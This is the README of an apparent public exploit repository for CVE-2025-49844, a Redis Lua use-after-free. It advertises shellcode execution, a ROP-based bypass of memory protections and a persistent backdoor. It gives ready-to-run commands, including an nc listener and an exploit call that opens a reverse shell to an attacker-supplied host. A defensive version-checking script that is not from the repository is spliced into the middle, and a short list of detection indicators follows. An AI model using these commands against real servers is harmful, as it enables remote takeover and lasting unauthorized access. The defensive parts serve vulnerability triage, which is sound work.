Yuri08loveElaina/CVE-2025-49844

CVE-2025-49844 - Redis Lua Interpreter UAF Exploit

Features

  • Exploit Use-After-Free (UAF) vulnerability in Redis Lua interpreter
  • Bypass ASLR via memory information leakage
  • Bypass DEP/NX using Return-Oriented Programming (ROP)
  • Heap spraying for reliable exploitation
  • Execute arbitrary shellcode on target systems
  • Establish persistent backdoor access
  • Multi-stage exploitation with memory manipulation

Requirements

  • Python 3.6+
  • Redis server with vulnerable version
  • Required Python packages:
pip install redis

Installation

git clone https://github.com/Yuri08loveElaina/CVE-2025-49844.git
cd CVE-2025-49844
pip install -r requirements.txt
chmod +x redis-exploit.py

Usage

Basic Vulnerability Check

python3 exploit.py -H <target_host> -p <port> [-a <password>]

Reverse Shell Establishment

First, start a listener on your machine

nc -lvnp 4444

Then, run the exploit with reverse shell parameters

python3 exploit.py -H <target_host> -p <port> [-a <password>] -l <your_ip> -P <your_port>

Options

  • -H, --host: Target Redis host (default: localhost)
  • -p, --port: Target Redis port (default: 6379)
  • -a, --auth: Redis password (if required)
  • -l, --lhost: Your IP address for reverse shell connection
  • -P, --lport: Your port for reverse shell connection (default: 4444)

Examples

Basic exploitation

python3 exploit.py -H 192.168.1.100

With authentication

python3 exploit.py -H 192.168.1.100 -p 6380 -a mypassword

With reverse shell

python3 exploit.py -H 192.168.1.100 -l 10.10.15.5 -P 4444

Exploit Stages

  • Connection & Version Check: Establish connection to target and verify vulnerability
  • Architecture Detection: Determine target architecture (x86/x64)
  • Heap Preparation: Spray heap to increase exploit reliability
  • UAF Object Creation: Create objects for Use-After-Free exploitation
  • Memory Leakage: Leak memory addresses to bypass ASLR
  • ROP Chain Construction: Build ROP chain to bypass DEP/NX
  • Shellcode Execution: Execute arbitrary shellcode on target
  • Persistence: Establish persistent backdoor if requested

Vulnerable Versions

  • Redis 7.2.x before 7.2.11
  • Redis 7.4.x before 7.4.6
  • Redis 8.0.x before 8.0.4
  • Redis 8.2.x before 8.2.2
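
For defenders triaging an inventory against the list above, the following is an added example (not code from this repository). It classifies a Redis version string, or the text returned by the INFO server command, against the four branches listed here. The function names, the status labels and the sample INFO text are assumptions constructed for illustration.

```python
import re

# First fixed patch level per branch, taken from the "Vulnerable Versions" list.
FIXED = {(7, 2): 11, (7, 4): 6, (8, 0): 4, (8, 2): 2}

# Constructed sample of INFO server output (CRLF line endings, as Redis sends).
SAMPLE_INFO = "# Server\r\nredis_version:7.2.4\r\nredis_mode:standalone\r\nos:Linux\r\n"


def parse_redis_version(text):
    """Return (major, minor, patch) from INFO output or a bare 'x.y.z' string."""
    m = re.search(r"^redis_version:(\d+)\.(\d+)\.(\d+)[ \t\r]*$", text, re.MULTILINE)
    if m is None:
        m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)\s*", text)
    if m is None:
        raise ValueError("no Redis version found")
    return tuple(int(g) for g in m.groups())


def classify(text):
    """Classify one server as 'vulnerable', 'patched' or 'not_listed'."""
    major, minor, patch = parse_redis_version(text)
    fixed_patch = FIXED.get((major, minor))
    if fixed_patch is None:
        # Branch is outside this page's list: check the vendor advisory instead
        # of assuming the server is safe.
        return "not_listed"
    return "vulnerable" if patch < fixed_patch else "patched"


def audit(inventory):
    """Map each host in {host: version_or_info_text} to a status label."""
    report = {}
    for host, text in inventory.items():
        try:
            report[host] = classify(text)
        except ValueError:
            report[host] = "unparseable"
    return report


if __name__ == "__main__":
    # Constructed inventory; host names are placeholders.
    hosts = {"cache-a": SAMPLE_INFO, "cache-b": "8.2.2", "cache-c": "6.2.14"}
    for host, status in audit(hosts).items():
        print(f"{host}: {status}")
```

A "not_listed" result means only that the branch does not appear in the list on this page; it is not a statement that the server is unaffected.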

Detection

The exploit attempts to minimize detection, but possible indicators include:

  • Unusual Lua script execution patterns with large payloads
  • Anomalous memory allocation behavior in Redis process
  • Unexpected process creation from Redis parent process
  • Network connections from Redis process to external hosts

Disclaimer

This tool is for educational and authorized security testing purposes only. The authors are not responsible for any misuse or damage caused by this tool. Use only on systems you own or have explicit permission to test.

License

This project is licensed under the MIT License - see the LICENSE file for details.
